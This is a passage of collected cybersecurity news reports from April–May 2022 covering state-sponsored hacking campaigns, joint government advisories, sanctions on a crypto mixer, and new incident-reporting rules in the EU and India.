What's more, the platform enables the operators to control the amount of likes, comments, and reactions a bot account can create as well as specify a numeric range of the number of friends such accounts should maintain. It also incorporates an "Albums" feature to store imagery for the bot accounts.
It's not immediately clear if the tool was ever used in real-world attacks, whether be it by the FSB or otherwise.
The findings come as Meta Platforms said it took steps against covert adversarial networks originating from Azerbaijan and Iran on its platform, by taking down the accounts and blocking their domains from being shared.
Cybersecurity company Mandiant, in an independent report published last week, revealed that actors aligned with nation-states such as Russia, Belarus, China, and Iran have mounted "concerted information operations" in the aftermath of Russia's full-scale invasion of Ukraine.
"Russia-aligned operations, including those attributed to Russian, Belarusian, and pro-Russia actors, have thus far employed the widest array of tactics, techniques, and procedures (TTPs) to support tactical and strategic objectives, directly linked to the conflict itself," Mandiant noted.
"Meanwhile, pro-PRC and pro-Iran campaigns have leveraged the Russian invasion opportunistically to further progress long-held strategic objectives."
U.S. Warns Against North Korean Hackers Posing as IT Freelancers
19.5.22 BigBrothers Thehackernews
Highly skilled software and mobile app developers from the Democratic People's Republic of Korea (DPRK) are posing as "non-DPRK nationals" in hopes of landing freelance employment in an attempt to enable the regime's malicious cyber intrusions.
That's according to a joint advisory from the U.S. Department of State, the Department of the Treasury, and the Federal Bureau of Investigation (FBI) issued on Monday.
Targets include financial, health, social media, sports, entertainment, and lifestyle-focused companies located in North America, Europe, and East Asia, with most of the dispatched workers situated in China, Russia, Africa, and Southeast Asia.
The goal, the U.S. agencies warn, is to generate a constant stream of revenue that sidesteps international sanctions imposed on the nation and help serve its economic and security priorities, including the development of nuclear and ballistic missiles.
"The North Korean government withholds up to 90 percent of wages of overseas workers which generates an annual revenue to the government of hundreds of millions of dollars," the guidance noted.
Some of the core areas where DPRK IT workers have been found to engage are software development; crypto platforms; graphic animation; online gambling; mobile games; dating, AI, and VR apps; hardware and firmware development; biometric recognition software; and database management.
DPRK IT workers are also known to take on projects that involve virtual currency, reflecting the country's continued interest in the technology and its history of targeted attacks aimed at the financial sector.
Additionally, they are said to abuse the privileged access obtained as contractors to provide logistical support to North Korean state-sponsored groups, share access to virtual infrastructure, facilitate the sale of stolen data, and assist in money laundering and virtual currency transfers.
Besides deliberately obfuscating their identities, locations, and nationality online by using VPNs and misrepresenting themselves as South Korean citizens, potential red flags indicating the involvement of DPRK IT workers are as follows -
Multiple logins into one account from various IP addresses in a short period
Logging into multiple accounts on the same platform from one IP address
Logged into accounts continuously for one or more days at a time
Use of ports such as 3389 that are associated with remote desktop sharing software
Using rogue client accounts on freelance work platforms to boost developer account ratings
Multiple developer accounts receiving high ratings from one client account in a short time
Frequent money transfers through payment platforms to China-based bank accounts, and
Seeking payment in virtual currency
In one instance highlighted in the advisory, North Korean developers working for an unnamed U.S. company carried out an unauthorized theft of over $50,000 in 30 small installments without the firm's knowledge over the course of several months.
"Hiring or supporting the activities of DPRK IT workers poses many risks, ranging from theft of intellectual property, data, and funds to reputational harm and legal consequences, including sanctions under both United States and United Nations authorities," the U.S. State Department said.
The advisory also comes as the department announced a $5 million reward last month for information that leads to the disruption of North Korea's cryptocurrency theft, cyber espionage, and other illicit nation-state activities.
Europe Agrees to Adopt New NIS2 Directive Aimed at Hardening Cybersecurity
17.5.22 BigBrothers Thehackernews
The European Parliament announced a "provisional agreement" aimed at improving cybersecurity and resilience of both public and private sector entities in the European Union.
The revised directive, called "NIS2" (short for network and information systems), is expected to replace the existing legislation on cybersecurity that was established in July 2016.
The revamp sets ground rules, requiring companies in energy, transport, financial markets, health, and digital infrastructure sectors to adhere to risk management measures and reporting obligations.
Among the provisions in the new legislation are flagging cybersecurity incidents to authorities within 24 hours, patching software vulnerabilities, and readying risk management measures to secure networks, failing which can incur monetary penalties.
"The directive will formally establish the European Cyber Crises Liaison Organization Network, EU-CyCLONe, which will support the coordinated management of large-scale cybersecurity incidents," the Council of the European Union said in a statement last week.
The development closely follows the European Commission's plans to "detect, report, block, and remove" child sexual abuse images and videos from online service providers, including messaging apps, prompting concerns that it may undermine end-to-end encryption (E2EE) protections.
The draft version of NIS2 explicitly spells out that the use of E2EE "should be reconciled with the Member States' powers to ensure the protection of their essential security interests and public security, and to permit the investigation, detection and prosecution of criminal offenses in compliance with Union law."
It also stresses that "solutions for lawful access to information in end-to-end encrypted communications should maintain the effectiveness of encryption in protecting privacy and security of communications, while providing an effective response to crime."
That said, the directive will not apply to organizations in verticals such as defense, national security, public security, law enforcement, judiciary, parliaments, and central banks.
As part of the proposed agreement, the European Union member states are mandated to incorporate the provisions into their national law within a period of 21 months from when the directive goes into force.
"The number, magnitude, sophistication, frequency and impact of cybersecurity incidents are increasing, and present a major threat to the functioning of network and information systems," the Council noted in the draft.
"Cybersecurity preparedness and effectiveness are therefore now more essential than ever to the proper functioning of the internal market."
Government Agencies Warn of Increase in Cyberattacks Targeting MSPs
12.5.22 BigBrothers Thehackernews
Multiple cybersecurity authorities from Australia, Canada, New Zealand, the U.K., and the U.S. on Wednesday released a joint advisory warning of threats targeting managed service providers (MSPs) and their customers.
Key among the recommendations include identifying and disabling accounts that are no longer in use, enforcing multi-factor authentication (MFA) on MSP accounts that access customer environments, and ensuring transparency in ownership of security roles and responsibilities.
MSPs have emerged as an attractive attack route for cybercriminals to scale their attacks, as a vulnerable provider can be weaponized as an initial access vector to breach several downstream customers at once.
The spillover effects of such intrusions, as witnessed in the wake of high-profile breaches aimed at SolarWinds and Kaseya in recent years, have once again underlined the need to secure the software supply chain.
The targeting of MSPs by malicious cyber actors in an effort to "exploit provider-customer network trust relationships" for follow-on activity such as ransomware and cyber espionage against the provider as well as its customer base, the agencies cautioned.
The major security measures and operational controls outlined in the advisory are as follows -
Prevent initial compromise by securing internet-facing devices and implementing protections against brute-forcing and phishing attacks
Enable effective monitoring and logging of systems
Secure remote access applications and mandate MFA where possible
Isolate critical business systems and apply appropriate network security safeguards
Apply the principle of least privilege throughout the network environment
Deprecate obsolete accounts through periodic audits
Prioritize security updates for operating systems, applications, and firmware, and
Regularly maintain and test offline backups for incident recovery.
The Five Eyes alert arrives a week after the U.S. National Institute of Standards and Technology (NIST) published updated cybersecurity guidance for managing risks in the supply chain.
"MSPs should understand their own supply chain risk and manage the cascading risks it poses to customers," the agencies said. "Customers should understand the supply chain risk associated with their MSP, including risk associated with third-party vendors or subcontractors."
E.U. Blames Russia for Cyberattack on KA-SAT Satellite Network Operated by Viasat
12.5.22 BigBrothers Thehackernews
The Five Eyes nations comprising Australia, Canada, New Zealand, the U.K., and the U.S., along with Ukraine and the European Union, formally pinned Russia for masterminding an attack on an international satellite communication (SATCOM) provider that had "spillover" effects across Europe.
The cyber offensive, which took place one hour before the Kremlin's military invasion of Ukraine on February 24, targeted the KA-SAT satellite network operated by telecommunications company Viasat, crippling the operations of wind farms and internet users in central Europe.
Viasat, in late March, disclosed that it had shipped nearly 30,000 modems to distributors to restore service to customers whose modems were rendered unusable.
"This cyberattack had a significant impact causing indiscriminate communication outages and disruptions across several public authorities, businesses and users in Ukraine, as well as affecting several E.U. Member States," the Council of the European Union said.
Calling it a deliberate and unacceptable cyberattack, the nations pointed fingers at Russia for its "continued pattern of irresponsible behavior in cyberspace, which also formed an integral part of its illegal and unjustified invasion of Ukraine."
The U.S. State Department said the digital assaults against commercial satellite communications networks were orchestrated to disrupt Ukrainian military command-and-control capabilities during the invasion.
An analysis from cybersecurity firm SentinelOne published last month revealed that the intrusion aimed at Viasat involved the use of a data-wiping malware dubbed AcidRain that's designed to remotely sabotage tens of thousands of vulnerable modems.
Furthermore, the discovery unearthed similarities between AcidRain and "dstr," a third-stage wiper module in VPNFilter, a botnet malware previously attributed to Russia's Sandworm group.
Besides the Viasat attacks, Australia and Canada also blamed the Russian government for targeting the Ukrainian banking sector in February 2022, COVID-19 vaccine research and development in 2020, and interfering in Georgia's 2020 parliamentary elections.
The attribution comes as Ukraine has been at the receiving end of a number of destructive attacks directed at public and private sector networks since the start of the year, launched as part of Russia's "hybrid" warfare strategy in concert with ground warfare.
The U.K.'s National Cyber Security Centre (NCSC) noted that Russian military intelligence agencies were "almost certainly" involved in the deployment of WhisperGate wiper malware and the defacements of several Ukrainian websites in January 2022.
AcidRain and WhisperGate are part of a long list of data wiper strains that has hit Ukraine in recent months, which also includes HermeticWiper (FoxBlade aka KillDisk), IssacWiper (Lasainraw), CaddyWiper, DesertBlade, DoubleZero (FiberLake), and Industroyer2.
"Russian hackers have been waging war against Ukraine in the cyberspace for the past eight years," the State Service for Special Communication and Information Protection of Ukraine (SSSCIP) said in a statement, adding they "pose a threat not only to Ukraine, but to the whole world."
"Their purpose is to damage and destroy, to wipe out data, to deny Ukrainian citizens' access to public services as well as to destabilize [the] situation in the country, to spread panic and distrust in the authorities among the people."
U.S. Sanctions Cryptocurrency Mixer Blender for Helping North Korea Launder Millions
7.5.22 BigBrothers Thehackernews
The U.S. Treasury Department on Friday moved to sanction virtual currency mixer Blender.io, marking the first time a mixing service has been subjected to economic blockades.
The move signals continued efforts on the part of the government to prevent North Korea's Lazarus Group from laundering the funds stolen from the unprecedented hack of Ronin Bridge in late March.
The newly imposed sanctions, issued by the U.S. Office of Foreign Assets Control (OFAC), target 45 Bitcoin addresses linked to Blender.io and four new wallets linked to Lazarus Group, an advanced persistent with ties to the Democratic People's Republic of Korea (DPRK).
"Blender was used in processing over $20.5 million of the illicit proceeds," the Treasury said, adding it was utilized by DPRK to "support its malicious cyber activities and money-laundering of stolen virtual currency."
Cryptocurrency mixers, also called tumblers, are privacy-focused services that allow users to move cryptocurrency assets between accounts without leaving a transaction trail by obfuscating their origins.
Mixers like Blender are known to take a "dynamic" service fee that ranges anywhere between 0.6% and 2.5% every time money is transferred to a wallet address under its control. Since its launch in 2017, Blender is estimated to have transferred more than $500 million worth of Bitcoin.
"Through these services, threat actors can achieve their end goal of cashing out and keeping the criminal underground liquid through the trade of illicit goods and services," Intel 471 noted in a report published in November 2021.
The Ronin Bridge hack saw the state-sponsored cyber hacking group stealing $540 million from a decentralized protocol that permits users to transfer their crypto between Ethereum and the popular blockchain game Axie Infinity.
On April 16, the Treasury Department blocklisted the Ethereum wallet address that received the stolen digital currency, although by then the Lazarus Group had managed to launder 18% of the siphoned funds (about $97 million) through centralized exchanges and an Ethereum mixing service called Tornado Cash.
Over the past two weeks, around $273.9 million of Ether was sent to four of the newly-sanctioned addresses, according to blockchain analytics firm Elliptic, with one of those addresses already moving $37 million through Tornado Cash, leaving behind $236 million.
"The transactions involved amounts significantly larger than their previous laundering efforts," the company said. "The ramping up of laundering efforts in this manner potentially reflects a growing desperation by the hackers."
Furthermore, the sanctioning of Blender is evidence that the "Lazarus Group had moved some of the stolen funds into Bitcoin," Elliptic pointed out.
On top of that, Blender is also said to have helped a number of the Russia-aligned ransomware gangs launder their money, including TrickBot, Conti (formerly Ryuk), Sodinokibi (aka REvil), and Gandcrab.
In the midst of all this, crypto exchange Binance on April 22 revealed that it had managed to recover $5.8 million worth of the Axie Infinity stolen funds that were spread across 86 accounts.
The development comes a month after the Treasury sanctioned virtual currency exchange Garantex for assisting criminal actors in laundering over $100 million in ill-gotten funds.
Last year, the department penalized two cryptocurrency exchanges SUEX and CHATEX for facilitating financial transactions for ransomware actors and cashing out the money extorted from victims.
In recent years, North Korea has been attached to a string of cyber-enabled heists from cryptocurrency exchanges and financial entities as a way of getting around international sanctions and generating revenue for its nuclear weapons program.
Last month, U.S. cybersecurity and intelligence agencies warned of a new set of cyberattacks carried out by the Lazarus Group targeting blockchain companies with rogue cryptocurrency apps.
"Virtual currency mixers that assist illicit transactions pose a threat to U.S. national security interests," said Brian E. Nelson, undersecretary of the Treasury for Terrorism and Financial Intelligence.
"We are taking action against illicit financial activity by the DPRK and will not allow state-sponsored thievery and its money-laundering enablers to go unanswered."
Experts Uncover New Espionage Attacks by Chinese 'Mustang Panda' Hackers
7.5.22 BigBrothers Thehackernews
The China-based threat actor known as Mustang Panda has been observed refining and retooling its tactics and malware to strike entities located in Asia, the European Union, Russia, and the U.S.
"Mustang Panda is a highly motivated APT group relying primarily on the use of topical lures and social engineering to trick victims into infecting themselves," Cisco Talos said in a new report detailing the group's evolving modus operandi.
The group is known to have targeted a wide range of organizations since at least 2012, with the actor primarily relying on email-based social engineering to gain initial access to drop PlugX, a backdoor predominantly deployed for long-term access.
Phishing messages attributed to the campaign contain malicious lures masquerading as official European Union reports on the ongoing conflict in Ukraine or Ukrainian government reports, both of which download malware onto compromised machines.
Also observed are phishing messages tailored to target various entities in the U.S. and several Asian countries like Myanmar, Hong Kong, Japan, and Taiwan.
The findings follow a recent report from Secureworks that the group may have been targeting Russian government officials using a decoy containing PlugX that disguised itself as a report on the border detachment to Blagoveshchensk.
But similar attacks detected towards the end of March 2022 show that the actors are updating their tactics by reducing the remote URLs used to obtain different components of the infection chain.
Other than PlugX, infection chains utilized by the APT group have involved the deployment of custom stagers, reverse shells, Meterpreter-based shellcode, and Cobalt Strike, all of which are used to establish remote access to their targets with the intention of conducting espionage and information theft.
"By using summit- and conference-themed lures in Asia and Europe, this attacker aims to gain as much long-term access as possible to conduct espionage and information theft," Talos researchers said.
Chinese Hackers Caught Stealing Intellectual Property from Multinational Companies
5.5.22 BigBrothers Thehackernews
An elusive and sophisticated cyberespionage campaign orchestrated by the China-backed Winnti group has managed to fly under the radar since at least 2019.
Dubbed "Operation CuckooBees" by Israeli cybersecurity company Cybereason, the massive intellectual property theft operation enabled the threat actor to exfiltrate hundreds of gigabytes of information.
Targets included technology and manufacturing companies primarily located in East Asia, Western Europe, and North America.
"The attackers targeted intellectual property developed by the victims, including sensitive documents, blueprints, diagrams, formulas, and manufacturing-related proprietary data," the researchers said.
"In addition, the attackers collected information that could be used for future cyberattacks, such as details about the target company's business units, network architecture, user accounts and credentials, employee emails, and customer data."
Winnti, also tracked by other cybersecurity vendors under the names APT41, Axiom, Barium, and Bronze Atlas, is known to be active since at least 2007.
"The group's intent is towards theft of intellectual property from organizations in developed economies, and with moderate confidence that this is on behalf of China to support decision making in a range of Chinese economic sectors," Secureworks notes in a threat profile of the actor.
The multi-phased infection chain documented by Cybereason involves the exploitation of internet-facing servers to deploy a web shell with the goal of conducting reconnaissance, lateral movement, and data exfiltration activities.
It's both complex and intricate, following a "house of cards" approach in that each component of the killchain depends on other modules in order to function, rendering analysis exceedingly difficult.
"This demonstrates the thought and effort that was put into both the malware and operational security considerations, making it almost impossible to analyze unless all pieces of the puzzle are assembled in the correct order," the researchers explained.
The data harvesting is facilitated by means of a modular loader called Spyder, which is used to decrypt and load additional payloads. Also used are four different payloads STASHLOG, SPARKLOG, PRIVATELOG, and DEPLOYLOG that are sequentially deployed to drop the WINNKIT, a kernel-level rootkit.
Crucial to the stealthiness of the campaign is the use of "rarely seen" techniques such as the abuse of Windows Common Log File System (CLFS) mechanism to stash the payloads, enabling the hacking group to conceal their payloads and evade detection by traditional security products.
Interestingly, parts of the attack sequence were previously detailed by Mandiant in September 2021, while pointing out the misuse of CLFS to hide second-stage payloads in an attempt to circumvent detection.
The cybersecurity firm attributed the malware to an unknown actor, but cautioned that it could have been deployed as part of a highly targeted activity.
"Because the file format is not widely used or documented, there are no available tools that can parse CLFS log files," Mandiant said at the time. "This provides attackers with an opportunity to hide their data as log records in a convenient way, because these are accessible through API functions."
WINNKIT, for its part, has a compilation timestamp of May 2019 and has almost zero detection rate in VirusTotal, highlighting the evasive nature of the malware that enabled the authors to stay undiscovered for years.
The ultimate goal of the intrusions, the researchers assessed, is to siphon proprietary information, research documents, source code, and blueprints for various technologies.
"Winnti is one of the most industrious groups operating on behalf of Chinese state-aligned interests," Cybereason said. "The threat [actor] employed an elaborate, multi-stage infection chain that was critical to enabling the group to remain undetected for so long."
Ukraine War Themed Files Become the Lure of Choice for a Wide Range of Hackers
5.5.22 BigBrothers Thehackernews
A growing number of threat actors are using the ongoing Russo-Ukrainian war as a lure in various phishing and malware campaigns, even as critical infrastructure entities continue to be heavily targeted.
"Government-backed actors from China, Iran, North Korea and Russia, as well as various unattributed groups, have used various Ukraine war-related themes in an effort to get targets to open malicious emails or click malicious links," Google Threat Analysis Group's (TAG) Billy Leonard said in a report.
"Financially motivated and criminal actors are also using current events as a means for targeting users," Leonard added.
One notable threat actor is Curious Gorge, which TAG has attributed to China People's Liberation Army Strategic Support Force (PLA SSF) and has been observed striking government, military, logistics and manufacturing organizations in Ukraine, Russia and Central Asia.
Attacks aimed at Russia have singled out several governmental entities, such as the Ministry of Foreign Affairs, with additional compromises impacting Russian defense contractors and manufacturers as well as an unnamed logistics company.
The findings follow disclosures that a China-linked government-sponsored threat actor known as Mustang Panda (aka Bronze President) may have been targeting Russian government officials with an updated version of a remote access trojan called PlugX.
Another set of phishing attacks involved APT28 (aka Fancy Bear) hackers targeting Ukrainian users with a .NET malware that's capable of stealing cookies and passwords from Chrome, Edge and Firefox browsers.
Also implicated were Russia-based threat groups, including Turla (aka Venomous Bear) and COLDRIVER (aka Callisto), as well as a Belarusian hacking crew named Ghostwriter in different credential phishing campaigns targeting defense and cybersecurity organizations in the Baltic region and high-risk individuals in Ukraine.
COLDRIVER, also called Gamaredon, Primitive Bear, Actinium, and Armageddon, has been linked to multiple phishing attacks targeting government officials in Ukraine, besides striking military, non-government organizations (NGO), judiciary, law enforcement, and non-profit organizations in the country for espionage purposes.
Ghostwriter's latest attacks directed victims to compromised websites, from where the users were sent to an attacker-controlled web page to harvest their credentials.
In an unrelated phishing campaign targeting entities in Eastern European countries, a previously unknown and financially motivated hacking group has been spotted impersonating a Russian agency to deploy a JavaScript backdoor called DarkWatchman onto infected computers.
IBM Security X-Force connected the intrusions to a threat cluster it's tracking under the moniker Hive0117.
"The campaign masquerades as official communications from the Russian Government's Federal Bailiffs Service, the Russian-language emails are addressed to users in Lithuania, Estonia, and Russia in the Telecommunications, Electronic and Industrial sectors," the company said.
The cyber activity update comes as Microsoft divulged that six different Russia-aligned actors launched at least 237 cyberattacks against Ukraine from February 23 to April 8, including 38 discrete destructive attacks that irrevocably destroyed files in hundreds of systems across dozens of organizations in the country.
The geopolitical tensions and the ensuing military invasion of Ukraine have also fueled an escalation in data wiper attacks intended to cripple mission critical processes and destroy forensic evidence.
What's more, the Computer Emergency Response Team of Ukraine (CERT-UA) revealed details of ongoing distributed denial-of-service (DDoS) attacks directed against government and news portals by injecting malicious JavaScript (dubbed "BrownFlood") into the compromised sites.
DDoS attacks have been reported beyond Ukraine as well. Last week, Romania's National Directorate of Cyber Security (DNSC) disclosed that several websites belonging to public and private institutions were "targeted by attackers who aimed to make these online services unavailable."
The attacks, claimed by a pro-Russian collective called Killnet, come in response to Romania's decision to support Ukraine in the military conflict with Russia.
Russian Hackers Targeting Diplomatic Entities in Europe, Americas, and Asia
3.5.22 BigBrothers Thehackernews
A Russian state-sponsored threat actor has been observed targeting diplomatic and government entities as part of a series of phishing campaigns commencing on January 17, 2022.
Threat intelligence and incident response firm Mandiant attributed the attacks to a hacking group tracked as APT29 (aka Cozy Bear), with some set of the activities associated with the crew assigned the moniker Nobelium (aka UNC2452/2652).
"This latest wave of spear phishing showcases APT29's enduring interests in obtaining diplomatic and foreign policy information from governments around the world," Mandiant said in a report published last week.
The initial access is said to have been aided through spear-phishing emails masquerading as administrative notices, using legitimate but compromised email addresses from other diplomatic entities.
These emails contain an HTML dropper attachment called ROOTSAW (aka EnvyScout) that, when opened, triggers an infection sequence that delivers and executes a downloader dubbed BEATDROP on a target system.
Written in C, BEATDROP is designed to retrieve next-stage malware from a remote command-and-control (C2) server. It achieves this by abusing Atlassian's Trello service to store victim information and fetch AES-encrypted shellcode payloads to be executed.
Also employed by APT29 is a tool named BOOMMIC (aka VaporRage) to establish a foothold within the environment, followed by escalating their privileges within the compromised network for lateral movement and extensive reconnaissance of hosts.
What's more, a subsequent operational shift observed in February 2022 saw the threat actor pivoting away from BEATDROP in favor of a C++-based loader referred to as BEACON, potentially reflecting the group's ability to periodically alter their TTPs to stay under the radar.
BEACON, programmed in C or C++, is part of the Cobalt Strike framework that facilitates arbitrary command execution, file transfer, and other backdoor functions such as capturing screenshots and keylogging.
The development follows the cybersecurity company's decision to merge the uncategorized cluster UNC2452 into APT29, while noting the highly sophisticated group's propensity for evolving and refining its technical tradecraft to obfuscate activity and limit its digital footprint to avoid detection.
Nobelium, notably, breached multiple enterprises by means of a supply chain attack in which the adversary accessed and tampered with SolarWinds source code, and used the vendor's legitimate software updates to spread the malware to customer systems.
"The consistent and steady advancement in TTPs speaks to its disciplined nature and commitment to stealthy operations and persistence," Mandiant said, characterizing APT29 as an "evolving, disciplined, and highly skilled threat actor that operates with a heightened level of operational security (OPSEC) for the purposes of intelligence collection."
The findings also coincide with a special report from Microsoft, which observed Nobelium attempting to breach IT firms serving government customers in NATO member states, using the access to siphon data from Western foreign policy organizations.
Microsoft Documents Over 200 Cyberattacks by Russia Against Ukraine
29.4.22 BigBrothers Thehackernews
At least six different Russia-aligned actors launched no less than 237 cyberattacks against Ukraine from February 23 to April 8, including 38 discrete destructive attacks that irrevocably destroyed files in hundreds of systems across dozens of organizations in the country.
"Collectively, the cyber and kinetic actions work to disrupt or degrade Ukrainian government and military functions and undermine the public's trust in those same institutions," the company's Digital Security Unit (DSU) said in a special report.
The major malware families that have been leveraged for destructive activity as part of Russia's relentless digital assaults include: WhisperGate, HermeticWiper (FoxBlade aka KillDisk), HermeticRansom (SonicVote), IssacWiper (Lasainraw), CaddyWiper, DesertBlade, DoubleZero (FiberLake), and Industroyer2.
WhisperGate, HermeticWiper, IssacWiper, and CaddyWiper are all data wipers designed to overwrite data and render machines unbootable, while DoubleZero is a .NET malware capable of data deletion. DesertBlade, also a data wiper, is said to have been launched against an unnamed broadcasting company in Ukraine on March 1.
SonicVote, on the other hand, is a file encryptor detected in conjunction with HermeticWiper to disguise the intrusions as a ransomware attack, while Industroyer2 specifically targets operational technology to sabotage critical industrial production and processes.
Microsoft attributed HermeticWiper, CaddyWiper, and Industroyer2 with moderate confidence to a Russian state-sponsored actor named Sandworm (aka Iridium). The WhisperGate attacks have been tied to a previously unknown cluster dubbed DEV-0586, which is believed to be affiliated to Russia's GRU military intelligence.
32% of the total 38 destructive attacks are estimated to have singled out Ukrainian government organizations at the national, regional and city levels, with over 40% of the attacks aimed at organizations in critical infrastructure sectors in the nations.
In addition, Microsoft said it observed Nobelium, the threat actor blamed for the 2020 SolarWinds supply chain attack, attempting to breach IT firms serving government customers in NATO member states, using the access to siphon data from Western foreign policy organizations.
Other malicious attacks involve phishing campaigns targeting military entities (Fancy Bear aka Strontium) and government officials (Primitive Bear aka Actinium) as well as data theft (Energetic Bear aka Bromine) and reconnaissance (Venomous Bear aka Krypton) operations.
"Russia's use of cyberattacks appears to be strongly correlated and sometimes directly timed with its kinetic military operations targeting services and institutions crucial for civilians," Tom Burt, corporate vice president of customer security and trust, said.
"Given Russian threat actors have been mirroring and augmenting military actions, we believe cyberattacks will continue to escalate as the conflict rages. It's likely the attacks we've observed are only a fraction of activity targeting Ukraine."
Indian Govt Orders Organizations to Report Security Breaches Within 6 Hours to CERT-In
29.4.22 BigBrothers Thehackernews
India's computer and emergency response team, CERT-In, on Thursday published new guidelines that require service providers, intermediaries, data centers, and government entities to compulsorily report cybersecurity incidents, including data breaches, within six hours.
"Any service provider, intermediary, data center, body corporate and Government organization shall mandatorily report cyber incidents [...] to CERT-In within six hours of noticing such incidents or being brought to notice about such incidents," the government said in a release.
The types of incidents that come under the ambit include, inter alia, compromise of critical systems, targeting scanning, unauthorized access to computers and social media accounts, website defacements, malware deployments, identity theft, DDoS attacks, data breaches and leaks, rogue mobile apps, and attacks against servers and network appliances like routers and IoT devices.
The government said it was taking these steps to ensure that requisite indicators of compromise (IoC) associated with the security events are readily available at hand to "carry out the analysis, investigation and coordination as per the process of law."
The directions also instruct concerned organizations to synchronize ICT system clocks to the Network Time Protocol (NTP) Server of the National Informatics Centre (NIC) or National Physical Laboratory (NPL), maintain logs of ICT systems for a rolling period of 180 days, and require VPN service providers to retain information like names, addresses, phone numbers, emails, and IP addresses of subscribers for a minimum of five years.
Additionally, the rules, which will take effect after 60 days, call for virtual asset service, exchange, and custodian wallet providers to keep records on Know Your Customer (KYC) and financial transactions for a period of five years.
"These directions shall enhance overall cyber security posture and ensure safe and trusted Internet in the country," India's Ministry of Electronics and Information Technology (MeitY) said in a statement.
U.S Cybersecurity Agency Lists 2021's Top 15 Most Exploited Software Vulnerabilities
29.4.22 BigBrothers Thehackernews
Log4Shell, ProxyShell, ProxyLogon, ZeroLogon, and flaws in Zoho ManageEngine AD SelfService Plus, Atlassian Confluence, and VMware vSphere Client emerged as some of the top exploited security vulnerabilities in 2021.
That's according to a "Top Routinely Exploited Vulnerabilities" report released by cybersecurity authorities from the Five Eyes nations Australia, Canada, New Zealand, the U.K., and the U.S.
Other frequently weaponized flaws included a remote code execution bug in Microsoft Exchange Server (CVE-2020-0688), an arbitrary file read vulnerability in Pulse Secure Pulse Connect Secure (CVE-2019-11510), and a path traversal defect in Fortinet FortiOS and FortiProxy (CVE-2018-13379).
Nine of the top 15 routinely exploited flaws were remote code execution vulnerabilities, followed by two privilege escalation weaknesses, and one each of security feature bypass, arbitrary code execution, arbitrary file read, and path traversal flaws.
"Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities," the agencies said in a joint advisory.
"For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (PoC) code within two weeks of the vulnerability's disclosure, likely facilitating exploitation by a broader range of malicious actors."
To mitigate the risk of exploitation of publicly known software vulnerabilities, the agencies are recommending organizations to apply patches in a timely fashion and implement a centralized patch management system.
U.S. Offers $10 Million Bounty for Information on 6 Russian Military Hackers
29.4.22 BigBrothers Thehackernews
The U.S. government on Tuesday announced up to $10 million in rewards for information on six hackers associated with the Russian military intelligence service.
"These individuals participated in malicious cyber activities on behalf of the Russian government against U.S. critical infrastructure in violation of the Computer Fraud and Abuse Act," the State Department's Rewards for Justice Program said.
All the six Russian officers are members of an advanced persistent threat group called Sandworm (aka Voodoo Bear or Iron Viking), which is known to be operating since at least 2008 with a specific focus on targeting entities in Ukraine with the goal of establishing an illicit, long-term presence in order to mine highly sensitive data.
The hackers, who are officers of the Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU), are as follows -
Artem Valeryevich Ochichenko, who has been linked to technical reconnaissance and spear-phishing campaigns to gain unauthorized access to IT networks of critical infrastructure facilities worldwide
Petr Nikolayevich Pliskin, Sergey Vladimirovich Detistov, Pavel Valeryevich Frolov, and Yuriy Sergeyevich Andrienko, who are said to have developed components of the NotPetya and Olympic Destroyer malware used by the Russian government on June 27, 2017 to infect computer systems, and
Anatoliy Sergeyevich Kovalev, who is accused of developing spear-phishing techniques and messages used by the Russian government to breach computer systems of critical infrastructure facilities
On October 15, 2020, the U.S. Justice Department indicted the aforementioned officers for carrying out destructive malware attacks with an aim to disrupt and destabilize other nations and cause monetary losses, charging them with conspiracy to commit wire fraud and aggravated identity theft.
As part of the initiative, the Rewards of Justice has set up a Tor website at "he5dybnt7sr6cm32xt77pazmtm65flqy6irivtflruqfc5ep7eiodiad[.]onion" that can be used to submit tips about these threat actors anonymously, or alternatively share the information via Signal, Telegram, or WhatsApp.
The Sandworm collective, not long ago, was attributed to a now-neutralized sophisticated botnet malware dubbed Cyclops Blink that ensnared internet-connected firewall devices and routers from WatchGuard and ASUS.
Other recent hacking activities associated with the group include the deployment of an upgraded version of the Industroyer malware against high-voltage electrical substations in Ukraine amidst Russia's ongoing invasion of the country.
Five Eyes Nations Warn of Russian Cyber Attacks Against Critical Infrastructure
23.4.22 BigBrothers Thehackernews
The Five Eyes nations have released a joint cybersecurity advisory warning of increased malicious attacks from Russian state-sponsored actors and criminal groups targeting critical infrastructure organizations amidst the ongoing military siege on Ukraine.
"Evolving intelligence indicates that the Russian government is exploring options for potential cyberattacks," authorities from Australia, Canada, New Zealand, the U.K., and the U.S. said.
"Russia's invasion of Ukraine could expose organizations both within and beyond the region to increased malicious cyber activity. This activity may occur as a response to the unprecedented economic costs imposed on Russia as well as material support provided by the United States and U.S. allies and partners."
The advisory follows another alert from the U.S. government cautioning of nation-state actors deploying specialized malware to maintain access to industrial control systems (ICS) and supervisory control and data acquisition (SCADA) devices.
Over the past two months since the invasion commenced, Ukraine has been subjected to a blitzkrieg of targeted campaigns ranging from distributed denial-of-service (DDoS) attacks to the deployment of destructive malware aimed at governmental and infrastructure entities.
Wednesday's alert noted that Russian state-sponsored cyber actors have the ability to compromise IT networks, maintain long-term persistence, steal sensitive data while remaining hidden, and disrupt and sabotage industrial control systems.
Also joining the mix are cybercriminal groups like Conti (aka Wizard Spider), which publicly pledged support for the Russian government. Other Russian-aligned cybercrime syndicates include The CoomingProject, Killnet, Mummy Spider (the operators of Emotet), Salty Spider, Scully Spider, Smoky Spider, and the XakNet Team.
"The message should be loud and clear, Russian nexus-state actors are on the prowl, cyberspace has become a messy, hot war-zone, and everyone should be prepared for an attack from any direction," Chris Grove, director of cybersecurity strategy at Nozomi Networks, said in a statement shared with The Hacker News.
The disclosure comes as the Federal Bureau of Investigation (FBI) notified of increased ransomware attacks likely targeting food and agriculture sectors companies during planting and harvest seasons.
"Cyber actors may perceive cooperatives as lucrative targets with a willingness to pay due to the time-sensitive role they play in agricultural production," the agency stated. "Initial intrusion vectors included known but unpatched common vulnerabilities and exploits, as well as secondary infections from the exploitation of shared network resources or compromise of managed services."
In a separate move, the U.S. Treasury Department moved to sanction Russian cryptocurrency mining company Bitriver for helping the country evade sanctions, marking the first time a virtual coin mining firm has come under an economic blocklist. Russia is the world's third-largest country for bitcoin mining.
